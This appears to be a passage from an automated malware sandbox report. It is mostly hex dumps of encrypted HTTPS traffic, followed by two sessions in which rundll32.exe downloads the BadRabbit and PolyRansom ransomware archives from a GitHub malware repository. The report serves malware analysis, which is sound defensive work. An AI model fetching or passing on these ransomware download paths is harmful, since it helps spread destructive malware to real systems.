                                                                                                                                                2022-09-29 12:48:50 UTC2284INData Raw: 5b 0c b1 ce b5 21 11 bb 18 ce c4 e1 47 77 5d 42 5d 91 db 1e 21 a0 f6 11 5a d2 04 f1 db 1f 26 1f 29 0f 91 97 91 52 e5 80 67 35 91 b1 b7 4c c1 f5 6f 36 3b 3a 47 ea 16 bf 26 78 a0 0a 7c 61 73 3d 34 4b fd ce a1 79 3e dc 60 47 34 fc f5 b5 ab a7 c2 e2 57 21 df ca 69 41 96 cd ab 9f d2 2f ea 32 83 bf 45 a2 ee d7 01 89 f2 92 4f ca 80 d8 e8 d2 4b 41 6f d1 00 e7 c2 88 6b a4 a5 ab 41 af 1b 00 42 f1 fd 72 d2 b0 dc 48 8b bd bf 49 7b ef 97 f6 c1 4d 0d e8 a9 6f e9 e2 f7 0d 08 52 73 61 e5 ef 4b 08 83 1a 4b 74 d5 f2 5e 49 de 6e fb d0 bd 24 0f 4d 9a 9f 02 36 80 45 c7 3d db 76 03 ec 5c 71 00 74 ee cc 75 ff a4 ef 6c 6d 04 61 9f 6f aa 75 d8 4b f6 6a ff 3d c0 12 de 51 b0 9b 38 38 e0 40 dc d6 fc 5a d4 0f 11 36 96 1d ca dc a1 5b 89 f2 f6 2f eb 97 5f ac 46 d8 8a eb a2 3f 9f 9c 8c
                                                                                                                                                Data Ascii: [!Gw]B]!Z&)Rg5Lo6;:G&x|as=4Ky>`G4W!iA/2EOKAokABrHI{MoRsaKKt^In$M6E=v\qtulmaouKj=Q88@Z6[/_F?
                                                                                                                                                2022-09-29 12:48:50 UTC2286INData Raw: ef 46 3b 81 34 99 f1 07 e3 30 56 a3 e4 79 68 95 e3 13 06 f1 67 75 f0 65 3a cc 59 6a da a4 44 fa 87 81 aa 34 a9 8f 07 d6 67 12 7e 67 12 cf 07 6e 27 de 38 03 61 72 74 87 4c 6e d2 55 f6 11 4f 89 b1 71 16 f6 42 66 25 46 23 41 0a 22 d5 47 6e f3 b5 7b 92 78 de 63 45 bc fa 79 fb 26 99 b8 c5 42 0e da e9 94 db 49 45 0d a8 a2 37 cf 05 7a 4c 66 49 c5 a3 08 34 1a 82 5c 7e dd cd 4d 18 f9 ef 3b 88 b5 da b3 1c 3e d0 73 cb df ff 23 e8 13 15 2c f5 10 d8 92 70 33 ea fc 6f 9f 64 b7 7b b8 fd d8 6b a6 bc e1 e4 36 db 2b 46 e0 09 66 e2 7d 6f 1b 07 1b 40 9b fa 20 ed 57 37 7f 75 9a d5 59 5e 46 54 f6 f9 d6 3e 42 38 0d 99 e3 18 98 78 f8 07 00 71 53 d8 80 39 a8 60 1a 20 59 20 e8 e6 6a d9 5c 48 7a c4 c3 52 c3 9a 0e 2c 0f 34 74 16 c0 2c f3 08 1c 95 41 32 7f 44 3a 88 79 3b c7 f7 4c 40
                                                                                                                                                Data Ascii: F;40Vyhgue:YjD4g~gn'8artLnUOqBf%F#A"Gn{xcEy&BIE7zLfI4\~M;>s#,p3od{k6+Ff}o@ W7uY^FT>B8xqS9` Y j\HzR,4t,A2D:y;L@
                                                                                                                                                2022-09-29 12:48:50 UTC2287INData Raw: 41 53 c1 bd 4f d5 c6 75 f6 a4 9f b1 5c 2c 8d 0f ec 41 90 d6 0d fe 70 0f fe f4 5d c5 5f 7d 85 d6 f9 5e e6 01 ef a4 e1 0d c4 74 b8 c0 62 34 4d f8 c7 39 d6 00 2e af 06 5b 47 9e 08 83 21 2f f9 b8 3f ab ee cd 5c 1a 10 5e ea 29 40 a8 27 bb 9c 29 fe d7 14 d3 6b 38 c5 bc fc a4 99 40 98 11 23 f9 dd 32 20 c7 c6 6e a3 fb 2f d6 31 45 b1 47 d9 52 57 12 76 36 8b 85 9d cd 99 ec 39 ac 39 7e d8 96 5b 66 2d 80 0a 38 f3 30 5e a8 82 21 41 35 2f b9 66 67 ec 6f 2b 93 1e 41 45 dd 82 81 96 9d 8e a5 0b 43 28 c4 c5 4b 96 5b 38 ff 83 45 c2 ac 3b 43 87 7a cc 23 be 4c 6b d5 f1 db 25 ec fb 7b ba 0a 48 f7 66 09 df eb 10 43 94 94 88 5a e1 27 59 9e 82 58 ab 84 35 95 bb 3b cf 3a 25 2c c9 2f 7a 6f 81 d5 3b f1 90 6e 69 8b 63 31 71 1e c5 0f 4b 86 ee c1 f5 63 ff ea 85 6f ea bb 00 5c 42 c2 c5
                                                                                                                                                Data Ascii: ASOu\,Ap]_}^tb4M9.[G!/?\^)@')k8@#2 n/1EGRWv699~[f-80^!A5/fgo+AEC(K[8E;Cz#Lk%{HfCZ'YX5;:%,/zo;nic1qKco\B
                                                                                                                                                2022-09-29 12:48:50 UTC2288INData Raw: cf 1e f7 a1 09 b8 b1 5e 56 5c 2e 9e c4 06 64 2b e5 5a 0f 25 56 e4 6d 3b f4 3d 94 75 6a 0d ff 05 53 aa 29 39 91 d0 e6 38 b2 f8 b2 11 7a 25 8a b9 69 9c 04 73 d6 cf c0 ed a9 07 ae bf 14 19 de 53 14 7c 82 fd 5a 5f 47 ba 47 25 68 3f 97 41 25 06 d3 77 6c 45 3c 99 47 f6 79 97 2a c1 b2 dc 6f c3 ef 32 fc ea 24 b9 3d b2 ba 03 c5 b4 58 2c e3 3c b4 7e dd 33 11 eb 70 5b 16 28 bd 18 a6 f5 8b 22 3e 9a e8 50 94 96 34 21 89 35 e1 0b b9 f0 f1 73 c5 38 2d 39 af 46 ff e6 47 15 5b 3e 88 da 97 f0 a2 31 d5 de 8e c9 20 e6 76 54 f3 92 8f 83 b2 d6 53 38 10 75 21 ba 35 af 7c d0 9a f0 c9 1a f3 0b 64 6f f3 3b 4d 99 ea 1d ac ec 4f 6f 95 5e 66 ba c2 49 ec b2 e3 bb b1 02 44 c3 39 6a 8b 3b 75 bc ad 8d 4b 52 53 b0 64 8d d0 33 5a 50 ce 58 52 36 b3 76 df 8f 54 22 1c ab c5 9c 34 96 2a af 6a
                                                                                                                                                Data Ascii: ^V\.d+Z%Vm;=ujS)98z%isS|Z_GG%h?A%wlE<Gy*o2$=X,<~3p[(">P4!5s8-9FG[>1 vTS8u!5|do;MOo^fID9j;uKRSd3ZPXR6vT"4*j
                                                                                                                                                2022-09-29 12:48:50 UTC2290INData Raw: b2 35 fb df 8a 96 e1 20 9e 75 c6 13 1c 93 06 47 b4 d2 25 1f 3b 46 67 8a cc 1d c6 19 22 84 fd b7 0e 01 6d b6 12 b6 50 20 bf 36 65 34 af e5 a0 6b 0e 91 c6 13 cd f8 16 e8 0a 1d 83 fd 6b 11 e8 ec b2 7d 51 cf db 09 63 49 a0 bb a1 a8 ea dc 6f 52 5f 81 10 08 f8 5c a5 bb 76 b5 8f ac 91 25 c8 9f 84 c8 d1 c8 8d c4 8c ea 5b f4 9f 5a b5 ba ef b1 33 d8 cf 98 18 d9 2e bd 11 ea 71 bf 20 43 56 60 b0 68 cc 08 8b ae a4 ee 88 5e 15 91 6a b4 33 a4 06 59 00 62 20 c1 c2 56 21 6c 34 05 65 f1 90 ab 87 49 03 ba 22 5b 4c 65 1d 72 01 f9 59 48 df eb 5a c0 ce 59 0c f1 8e 3c dc b2 1f a6 50 e2 90 d9 de fd 4f c2 c4 f7 1c 2f b3 82 a1 55 04 20 95 de 49 cd dd e3 fc 6e b5 ec 77 aa d0 b4 6d 38 a6 b1 16 50 13 fc 0c fd f1 03 78 67 f3 5f 17 03 e7 56 60 c9 58 74 89 ab bf e0 27 98 2c 88 c1 57 6b
                                                                                                                                                Data Ascii: 5 uG%;Fg"mP 6e4kk}QcIoR_\v%[Z3.q CV`h^j3Yb V!l4eI"[LerYHZY<PO/U Inwm8Pxg_V`Xt',Wk
                                                                                                                                                2022-09-29 12:48:50 UTC2291INData Raw: ff cc 64 9b 24 b6 cf 76 31 61 66 7a 33 9d 94 28 eb e0 05 53 d1 8d ad 80 41 1b dd 34 c0 63 14 ea 91 d4 f0 c9 21 44 cb 9f 85 9e 17 5f 0d 43 43 c6 fd 40 1a 66 9c 70 06 40 3e 1d 49 64 8c b6 97 83 7a 6e e4 fe 68 c4 15 c6 1c ed 94 f0 3d b5 8b 02 ac df 98 96 35 66 8c b9 f8 e5 35 84 e2 b5 8c a4 06 d1 3c 3b 47 91 ee b9 28 51 af 33 1d 6c 3d 1c a1 b3 f1 00 1d a8 19 94 8c c6 27 ea ef 7e c0 18 f1 f1 6f 46 1a f7 ec 0b 89 4c 3b 78 5a 75 6f 2e 38 96 f0 13 65 bc 1e 12 67 c4 c1 93 ef 47 15 79 97 6a ed fb 80 48 d3 01 a7 0c d9 5d 0b 25 b3 9b 1f 63 a9 d2 a1 f5 2c 44 b4 d6 ed e8 e1 20 be 98 87 bf d6 c0 5d 86 41 d7 1b 89 e9 55 bc 64 41 7f cf 6b 2a 8b be 6f 7b c5 04 27 6d b9 86 3f 13 db 22 9c bd 3f ef 7b 75 fe a3 df 28 48 d5 18 82 aa 35 9f 9a b7 50 fd 9c ea 58 77 06 4f 07 9e 1f
                                                                                                                                                Data Ascii: d$v1afz3(SA4c!D_CC@fp@>Idznh=5f5<;G(Q3l='~oFL;xZuo.8egGyjH]%c,D ]AUdAk*o{'m?"?{u(H5PXwO
                                                                                                                                                2022-09-29 12:48:50 UTC2292INData Raw: 09 31 3f e3 f7 e9 c7 ff 80 d4 b8 b9 97 3a c3 2d e0 b5 c6 73 21 73 86 70 d3 fd 71 39 a8 96 53 9a b5 3f e6 23 68 9c 32 6a bc 16 6b bf 39 12 af 6b 02 a9 13 57 3c 1d 32 9e 2d d1 4e bd a3 96 a7 16 da 56 af 62 eb ee 76 ed 2a ac df e5 75 85 92 87 57 74 88 b4 b8 c8 b8 97 85 fe 3b b0 59 1b 90 61 1e ae 06 df 99 22 18 71 b4 b1 c0 d2 e2 86 b8 77 e3 40 a2 0d 34 6f a1 d5 68 06 e1 8c 15 c0 64 57 d9 bb 9b 21 ea 85 55 85 93 14 db b8 d2 88 89 06 50 65 ec 6c a6 51 11 c6 1d 1c f9 0a 48 61 29 e4 c6 72 f4 d6 81 e2 c3 ad bc d0 6a 96 26 06 fa 71 99 f5 95 8c 06 4f 1a db c4 07 a5 f6 7e fa bc 59 b5 d8 4f 5c 8a d1 ab 1f 8b c6 37 4f 20 7f b1 75 fb 32 bd 24 ea f9 e8 85 2f 0e 6a 0e 2f 10 94 8e 98 c3 ea ed 74 be af 94 a2 68 65 6a 53 57 49 d7 9c e3 31 09 d5 e2 dd 86 40 a4 2b 8f 58 b0 ea
                                                                                                                                                Data Ascii: 1?:-s!spq9S?#h2jk9kW<2-NVbv*uWt;Ya"qw@4ohdW!UPelQHa)rj&qO~YO\7O u2$/j/thejSWI1@+X
                                                                                                                                                2022-09-29 12:48:50 UTC2294INData Raw: c5 00 7e 13 39 b1 ab 0e 3e 07 0c 56 a3 15 e3 6f d6 ca fb d9 b4 10 77 58 48 f4 de dc 74 76 2d f1 ca 93 5f ee 59 40 06 e1 94 c1 a6 f3 14 17 12 14 6c 4a 4e 90 ce cb 4d 5f 41 13 4f f5 17 14 12 34 e9 85 c4 ce b5 da ac a3 55 6c a2 7f ee 37 1a 2f 8c 75 ab 13 ac 4a 49 0b 86 74 84 22 84 c5 f4 10 2e 93 93 e4 4a 17 e0 55 68 14 81 e8 21 45 bd 0b 5f 8f c5 56 66 93 44 93 ac dc ff 66 06 75 0f 02 d1 8c be ef 40 45 f6 84 48 04 d8 46 f9 7f bd 82 76 24 ed 17 c8 37 70 41 44 e7 5a c7 4c 1a 10 a8 40 cd 88 92 7f ce 28 f3 0d 7b 46 97 ef 4e 21 ed 7a 67 77 2b 1c a3 02 25 50 ce 21 af 47 1f 30 6a 1a 07 19 c0 29 34 23 c5 43 f7 e2 c8 e9 03 d9 de cf ca 45 66 ec 4f 5f d3 f6 0f 0d c4 fc b2 2a 54 96 97 1a eb 53 a5 25 5e 3f 87 cc 4c a4 37 11 bd 9f db e6 94 75 6e 94 3c b1 cf 58 94 ae 14 5d
                                                                                                                                                Data Ascii: ~9>VowXHtv-_Y@lJNM_AO4Ul7/uJIt".JUh!E_VfDfu@EHFv$7pADZL@({FN!zgw+%P!G0j)4#CEfO_*TS%^?L7un<X]
                                                                                                                                                2022-09-29 12:48:50 UTC2295INData Raw: 58 a3 83 e8 c9 a0 a8 e8 6b 83 28 19 43 f0 50 31 a3 2c 81 66 59 fc 30 11 70 58 6b f6 07 ae f5 5b 49 a5 07 9a 11 04 ae e1 da 82 d8 d0 30 11 70 cc 3b b2 be 6d 85 af 35 35 b6 85 98 bf 6c 81 a2 1f fc b5 5b db 1e fb ed 2d ab e7 6c 2e 10 af ad 13 a7 fc 05 2e cf dc ce 53 10 6e db da d1 54 8a 96 13 56 86 87 7a 43 b8 cb 34 6d dc 47 fc b8 c3 6b ed f4 36 b4 3b 21 8e 1f e5 cb 90 1e 5c e8 66 a2 e9 c0 8e cb 92 a7 e2 17 2b 1e 5d 2e 35 00 79 d5 69 7f c0 3d 85 91 12 01 c8 86 04 45 3e eb b6 bc f3 ca f1 30 9c 04 64 cb 40 44 d3 f7 f8 cd 3a 00 f1 50 66 fb ea 65 6b f6 77 2c e8 3c 40 f4 28 24 1c e3 24 49 7f 5b cf 0f 89 84 ed d9 2e dd fd 94 78 db 6e 95 16 42 65 32 00 b9 50 a9 bf 4d 93 1e b8 10 e9 3a 40 28 67 77 fc 4e 5a 2f 30 e1 4f 72 67 9f dc 85 96 96 e7 1e 93 97 8e bb c4 f3 80
                                                                                                                                                Data Ascii: Xk(CP1,fY0pXk[I0p;m55l[-l..SnTVzC4mGk6;!\f+].5yi=E>0d@D:Pfekw,<@($$I[.xnBe2PM:@(gwNZ/0Org
                                                                                                                                                2022-09-29 12:48:50 UTC2296INData Raw: 6a da 60 92 2d a2 c6 43 b3 5b b4 c6 85 db a7 46 be e4 59 57 42 83 93 3f ca 0c c1 5e 63 a7 cd 83 55 8e 5d 70 9e b9 8d 47 bb bc 55 c4 c8 6e 6e 97 10 c4 73 f6 93 dc 9a 58 87 e1 78 01 b6 bb c5 5c 72 99 9a e6 06 11 f1 a1 e3 5b 05 74 9e 1e 9d 14 16 c4 58 82 55 fb 81 02 8a 87 30 c6 15 0b 71 6a 8c a5 95 d1 f6 18 1a bc 3d 49 9f 09 40 a3 5e 4c 70 8a 6e 4b 42 d5 04 f7 92 2a fa c1 6c 8e 5e af 2d 27 21 df 09 f9 dc 3f 33 8b f5 67 21 60 5e 63 e7 25 7a 41 50 11 5f f7 8a ed 33 98 22 a0 44 65 1f 97 e7 ff 87 0b 2a 9c 2a c8 15 ec ac 8a 2c fc 23 17 fd 55 9b a4 3f 2e 95 8b 13 44 1a 2b e3 2b a6 01 17 ff 0f 40 72 32 be e6 bf 69 76 8b 79 19 53 5c e0 bb 4c 0f d4 e1 d9 c6 bf 21 29 be 11 46 32 44 6f 1b 05 b5 99 2d 55 e8 ef e7 c7 39 89 6e cc f6 da a8 14 17 ab 2b ee 01 40 74 a3 3f 23
                                                                                                                                                Data Ascii: j`-C[FYWB?^cU]pGUnnsXx\r[tXU0qj=I@^LpnKB*l^-'!?3g!`^c%zAP_3"De**,#U?.D++@r2ivyS\L!)F2Do-U9n+@t?#
                                                                                                                                                2022-09-29 12:48:50 UTC2298INData Raw: fa 23 31 96 9b cc 51 d6 58 89 43 cb 99 6a 3d d6 24 c9 7d 06 c3 3a 28 e5 ce 94 a0 2d 45 a1 ea f1 2e 8d 10 e9 dd f1 c9 9f 11 b8 af 80 75 55 7b 40 ff 91 d9 e0 8f 10 e7 c9 2b 7f f3 a1 2c 59 51 97 f4 10 62 a1 fc ce 32 90 ae 08 29 0a 96 a6 55 81 89 f2 49 2d 16 3d 5a 45 8a 2e 6f f0 0e 19 1f 56 d2 92 88 e2 98 cd 2b 64 c6 21 e7 47 2d 03 0c c1 a2 0e 1e cd 08 fb 76 c0 01 93 18 d7 6f 31 89 58 57 aa 52 05 94 a2 98 39 73 d0 1e 9d f1 f9 cb 38 3a 64 e0 cf 9c 89 bc 9c 13 17 5f f2 f6 a7 7c a1 ea 76 39 a6 4f c7 ce dc 5a 02 a1 95 bc a6 65 e2 81 a7 c3 a5 eb d2 42 00 9f f7 70 18 85 fb 6f d1 bd 94 ef 3b 2b ec 68 f0 a7 b7 fd 2d 05 0b 9f c1 fc f8 e6 40 bf 96 bd 87 4f 8c d7 79 00 fe 32 d8 32 59 c8 9f 3b 15 51 dc 47 f7 23 c1 ea 49 cb 4b 36 77 46 46 71 fb 6b 62 e8 7b 6b 3e 15 a3 9b
                                                                                                                                                Data Ascii: #1QXCj=$}:(-E.uU{@+,YQb2)UI-=ZE.oV+d!G-vo1XWR9s8:d_|v9OZeBpo;+h-@Oy22Y;QG#IK6wFFqkb{k>
                                                                                                                                                2022-09-29 12:48:50 UTC2298INData Raw: 42 9c 8f 6f 17 89 93 78 eb 53 bd c0 f2 e5 98 a6 71 68 6d 34 b5 19 cf 7c e6 ee ae f5 a8 0b cc 71 b5 b0 80 2b 49 c4 2b 51 40 e9 5d f2 f6 0a 56 c5 dc b9 f5 cb 98 7d bf 5f 2e c7 9d e0 f8 18 7b ba 56 1c af 6e b0 24 af 8e 3e 85 f0 47 60 58 84 27 f8 fb 9a 02 51 c9 40 f5 a3 61 10 a6 ef 36 db d9 9f 63 b6 3d a7 95 db dd 70 7b da ec 06 51 95 75 d6 b3 47 b9 28 2a ec 40 d6 1b 28 53 bf a5 7b 51 a7 1b dc 67 c3 95 63 2e 4a 35 56 a9 c6 da a5 49 f0 76 6c 64 b8 70 ea d0 59 30 7f ed 0b bf ed da d2 e6 d7 24 ee 79 1a 4b 94 23 2b da 2c ee 75 88 b7 87 ad 5e 6b a1 a3 51 d2 e5 f3 f5 84 38 db 2f ff 87 f0 50 ae 0f 20 c3 87 b1 e4 a0 62 0e a4 5c 5b 71 c2 e0 4a 95 13 52 9a b4 35 80 1d 65 d3 d6 11 d3 51 a3 a3 97 48 2d ab 82 c8 20 68 f1 c7 5d b7 5e 79 ff 86 b5 a4 21 19 d1 c3 10 9a 2f ea
                                                                                                                                                Data Ascii: BoxSqhm4|q+I+Q@]V}_.{Vn$>G`X'Q@a6c=p{QuG(*@(S{Qgc.J5VIvldpY0$yK#+,u^kQ8/P b\[qJR5eQH- h]^y!/
                                                                                                                                                2022-09-29 12:48:50 UTC2314INData Raw: d6 08 63 97 86 aa af 17 a8 1f 43 98 ce c0 b0 d1 e7 a8 25 45 14 80 44 d5 08 70 72 7e 78 a8 75 de 6d f5 50 05 1c 48 59 67 5e ac 43 24 46 48 01 4e f6 74 1c 36 0f 51 f1 42 2a a0 27 35 aa 15 b0 7e f9 28 5c 40 7b f9 d4 49 8b e8 dd 24 06 76 4b e3 29 63 f6 6d ca f0 f2 6b 93 cd e6 d8 df 06 d9 03 c6 8c 55 e7 4d 5b 81 b1 68 1a 7f 96 16 7f a7 17 bc b4 4a a0 ee 95 d4 ab 51 33 58 e5 fe 77 2e 58 76 bd 48 1d 4c f7 1c fe 8a 22 91 3a 26 73 db 65 5b ef 4f 0b 7b a9 c4 6c 90 b1 7d 27 70 08 fb 9a 8b 41 38 e2 39 91 d1 e6 a6 10 c0 fe fd c9 1a 98 62 06 37 10 e0 9e ec db 54 33 db a9 bb 84 92 d8 ad 66 de 29 53 06 a3 35 17 0b 83 f7 5f 41 c3 a0 05 41 5f 66 09 82 ab dc d3 00 6a 87 86 7b 23 50 38 17 0c 9e 1b ea ab 03 ce 31 14 f7 96 81 4e 9d 93 37 f3 63 86 15 01 d9 5e 2e ad 02 2b 6c e1
                                                                                                                                                Data Ascii: cC%EDpr~xumPHYg^C$FHNt6QB*'5~(\@{I$vK)cmkUM[hJQ3Xw.XvHL":&se[O{l}'pA89b7T3f)S5_AA_fj{#P81N7c^.+l
                                                                                                                                                2022-09-29 12:48:50 UTC2330INData Raw: e8 a3 bb 3f ec 00 41 50 f9 32 44 c8 4c 7b 66 15 de 86 75 06 e9 05 9c 51 fc b8 69 d5 14 32 0b 97 6a f6 dd ec 37 e9 ef 0e d3 64 07 80 df b7 b5 10 e4 05 88 dd 2d 51 30 46 dd 5a 2a a4 24 25 31 5b 7f 04 32 40 70 3a 0c 85 c9 81 21 e6 44 c6 42 64 cc 9b 01 4e cc ba f7 0d 62 95 c2 7d 83 2a 77 22 30 75 aa 1b 15 03 c2 8a 7d bc 8b 19 ca 5a e8 03 61 8d e9 f2 58 8d 39 a6 ff 7c 79 8d f2 82 53 f2 54 77 04 b1 dd 7b 9d 45 d6 7a 4d dc c0 d3 be 34 9c 4c 1a d0 0e a5 92 84 6d bd ce cc 40 b6 e9 57 66 86 29 da 01 56 ac 56 96 d0 ad 01 e3 21 35 73 b6 6a 02 40 ca f8 14 cc e5 e3 2a d9 5f 40 df cd c5 f9 05 52 6b 2d 08 9a 83 37 5a 37 cd 7a d2 97 21 81 9e f6 17 e9 f6 db 46 52 ce cc a2 76 b0 6e bc 79 83 ea 5b 6d 61 fe eb ef 59 77 b1 b0 f9 3a ff ef e6 ab 8e 75 24 fb 7f 74 b1 c7 92 65 8f
                                                                                                                                                Data Ascii: ?AP2DL{fuQi2j7d-Q0FZ*$%1[2@p:!DBdNb}*w"0u}ZaX9|ySTw{EzM4Lm@Wf)VV!5sj@*_@Rk-7Z7z!FRvny[maYw:u$te
                                                                                                                                                2022-09-29 12:48:50 UTC2346INData Raw: 85 1e 89 cf 47 14 b9 f7 4e 41 dd 56 3a d5 0b 13 13 1b 68 38 6e ef 83 4f 2a 3d 7a 0c 31 4e 8a 2a 17 81 45 fb 39 f2 14 a9 25 d7 c2 da 60 24 6e 4a a1 d5 fc cb 6c 19 d1 56 ad 5c ce 9d a2 eb 92 50 10 54 35 04 28 8b 54 70 4f e4 c9 92 f0 2c de 34 20 ad e8 29 fc c1 01 3a 63 6d 82 31 6e 7b bc 42 5c 0f eb 32 44 8b ef b1 47 c3 10 fd 01 ad c0 78 f7 53 57 d3 49 d2 c3 68 7b c0 64 d0 44 b4 43 14 db fb d4 36 38 f8 0b 3e e8 0e 40 e3 96 b2 1e 23 8c 70 8f 04 db 1a 0f fd 9a 84 e4 8b 3e 7e 72 09 c0 ac ec 16 ec 75 5e 56 3e 4e a4 85 60 5d 37 cf 0a fc e7 0f 32 cf 68 fb 99 42 5d 0f b6 88 d6 1f 54 e2 97 2c 6f 0e a7 be 5a ba 0c 95 72 5e 2e 18 1c c1 19 c7 d4 eb d3 46 cc 2e a2 29 b2 46 66 40 85 b1 ce 2e 47 3e a9 a4 38 8a 63 0e 88 4d c8 c4 7b c8 15 ca 03 b0 d5 c1 d7 09 79 7f 37 a4 1d
                                                                                                                                                Data Ascii: GNAV:h8nO*=z1N*E9%`$nJlV\PT5(TpO,4 ):cm1n{B\2DGxSWIh{dDC68>@#p>~ru^V>N`]72hB]T,oZr^.F.)Ff@.G>8cM{y7
                                                                                                                                                2022-09-29 12:48:50 UTC2362INData Raw: a6 8f 02 f0 0a 68 3b 6f a7 ff fd 55 71 89 e6 13 fb 33 e4 3c 96 59 6f 57 24 d7 45 2a d2 f5 1a f7 db 4b 3b dc 2f ea 93 d3 cd 0f 5d db 51 80 20 0c d9 5e a3 3e d6 72 79 a4 c3 95 90 53 3a 44 6d e5 5d 06 a1 a8 f6 09 e7 49 d8 b2 81 fc 8e ac 51 b7 d7 ab 8f da dd d9 67 08 35 0a 8b f6 26 ac 8c d7 a6 50 ec 52 58 29 55 be 5b 7e 39 e0 06 81 2a 03 3d fd 79 45 e2 d0 52 2e d6 18 ad 6d 4c db 9b b8 e7 5d 7c c3 41 47 73 73 1d 9c 14 2a 6c e3 da 39 de 0c eb 2e 43 28 bf 07 d4 b7 5f e4 04 f5 f1 2d 65 90 92 2b bb a3 e6 05 2a 1a 20 c0 bf a3 e6 fd 14 b9 fd 1b bd 6d f1 27 90 ca 60 86 48 ab d2 98 14 6b 92 a7 2e df 66 7f 4c eb 29 ed 31 8f 6d ae 43 0a fd a8 1b d5 1f 31 a0 d7 c8 23 8d d3 91 03 8a 6d ca 7b 42 af 29 52 90 52 dc 13 51 e7 e7 77 fd 9c af 1c c7 3a e1 ad 40 b4 41 7a b8 12 55
                                                                                                                                                Data Ascii: h;oUq3<YoW$E*K;/]Q ^>ryS:Dm]IQg5&PRX)U[~9*=yER.mL]|AGss*l9.C(_-e+* m'`Hk.fL)1mC1#m{B)RRQw:@AzU
                                                                                                                                                2022-09-29 12:48:50 UTC2378INData Raw: ce cf 69 ba 7b f7 03 26 f2 08 ed b3 40 e5 36 21 3d 6d 85 7a d4 0e c4 b6 0e b4 f4 05 e5 84 f3 48 5c 05 42 c7 6d 14 2c 21 a9 f6 05 1b 97 65 df 07 c7 10 e9 a9 d5 10 14 4a 5b 0b ed 99 a6 12 ad 4f ad 36 cd dc d8 f1 e7 b6 78 ff ed 88 f5 9b 9d 0b f1 55 c5 5f 14 ef 33 70 51 b0 e6 7d c6 36 b9 07 b3 89 45 6b f1 41 0a ee 0d 23 dc be b6 c2 24 2a e4 7c a2 ad fe 6a a7 9e 79 3c 44 cd b6 56 88 c7 b6 71 25 d8 27 b0 bb 99 b2 9e 62 f5 10 b5 fc 4b 72 e9 fd e8 a1 4e bc c9 b9 c2 67 e7 08 b6 96 8f 72 b9 4b 1a 22 56 13 87 75 c7 14 78 dc 39 49 7e 39 bd ad 91 08 d4 20 2a 28 91 0e 5f 9a c5 6b e9 81 25 ba 78 6c aa 57 34 28 89 bc b4 78 79 14 2d 88 04 9f fd ff 9e 55 3e 0a fc a8 7e 4b 2d 2d 79 87 e7 db 98 73 8e ab 58 ed 36 17 ab 3e 37 eb b6 4a c4 dc a4 95 e5 1b 8d 72 b3 00 89 07 a0 b1
                                                                                                                                                Data Ascii: i{&@6!=mzH\Bm,!eJ[O6xU_3pQ}6EkA#$*|jy<DVq%'bKrNgrK"Vux9I~9 *(_k%xlW4(xy-U>~K--ysX6>7Jr
                                                                                                                                                2022-09-29 12:48:50 UTC2394INData Raw: b4 54 bb d7 3b d4 dc 5c dd df 5d a5 4a 7f 1f 42 b6 e5 9e a7 50 c3 f1 f1 36 a2 db 29 ad ad 26 75 e0 92 0c d3 d7 ae 63 80 02 6a 77 2c d7 59 c7 f3 fa 1e c4 67 d9 0c 07 14 86 62 32 a7 37 b9 82 2d d7 7e 6e dc ad bb 0e f4 dc 33 95 8e ac 00 33 74 29 fb 8f 95 80 4e b9 2b 94 74 02 b2 7d 15 b1 de a8 cc e8 1a d3 74 da 34 fd 79 e5 c7 07 4a c5 a0 a4 8e 87 9f ca 46 84 40 f5 8d 01 4b 66 0a d0 2c b8 24 9b f4 f7 b8 26 8e 21 82 a2 eb 19 ea ff f5 09 19 8a 1b 56 72 45 bb 9d 25 38 b6 88 96 93 e2 40 e5 32 47 af 15 8a 8b f4 5c b1 a7 d6 e7 77 5a bb 9f 21 84 69 2b 1b 43 38 d0 79 95 59 c6 13 33 28 8d 4e e0 75 7c fc 90 82 80 d7 86 8d 79 9f 61 20 ef c2 40 37 ea a4 bc 23 cb 74 6e 42 9c 55 29 58 f5 7d c7 46 07 fe 67 8a 53 99 08 13 f7 62 c4 29 5f 34 3a 89 8f 29 75 db 31 4d 37 27 37 c5
                                                                                                                                                Data Ascii: T;\]JBP6)&ucjw,Ygb27-~n33t)N+t}t4yJF@Kf,$&!VrE%8@2G\wZ!i+C8yY3(Nu|ya @7#tnBU)X}FgSb)_4:)u1M7'7
                                                                                                                                                2022-09-29 12:48:50 UTC2410INData Raw: 3e 3f 53 7a 4f 8a 20 50 a7 01 6f 31 d7 fc 42 78 a1 d5 8a 93 37 19 f2 c5 f5 11 40 1f c5 63 2e 25 c9 58 a2 4b 78 69 b9 dc 82 28 15 ab 60 7a c7 a6 6c e3 1d bf 3a f5 f9 bc 06 f0 fe c5 fe 21 8f 19 d3 1d ce df 64 58 67 74 21 43 98 c2 3f 34 dd 9c e3 89 91 82 ab 60 f6 a1 8d 2c 57 3e cd 1f 81 2f c0 b2 b7 ba 70 9c 3e 79 3f 18 88 9e f7 80 46 96 0d e5 64 4a 60 03 2c d9 12 5b 97 e8 04 80 d7 28 aa 8d 5a 41 fe f2 dd 2c b2 47 d1 f8 0a b7 ec 90 2f d2 2d 0e 03 d1 28 78 c7 ff 22 9a 2c 2a b1 62 4b ad 6b 9c 29 20 b5 59 07 98 b8 0e b8 7a b3 cf 98 4a 47 ef 63 00 89 03 5e 26 57 2a 52 52 40 b7 96 7b 1e a3 07 bd 58 42 ab 67 b8 4a 9f 42 9d 69 ba be 56 29 fd b4 ab 09 46 4b 23 3d 6e ff 6c 6a 14 bf 12 2f a8 47 ff 68 3b 77 97 67 43 45 de 43 00 c8 8c bd 72 6b 39 3b fe 67 ce ec 67 d9 37
                                                                                                                                                Data Ascii: >?SzO Po1Bx7@c.%XKxi(`zl:!dXgt!C?4`,W>/p>y?FdJ`,[(ZA,G/-(x",*bKk) YzJGc^&W*RR@{XBgJBiV)FK#=nlj/Gh;wgCECrk9;gg7


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                4192.168.2.349685140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:20 UTC180OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                40192.168.2.349719140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:53 UTC2411OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                Host: github.com


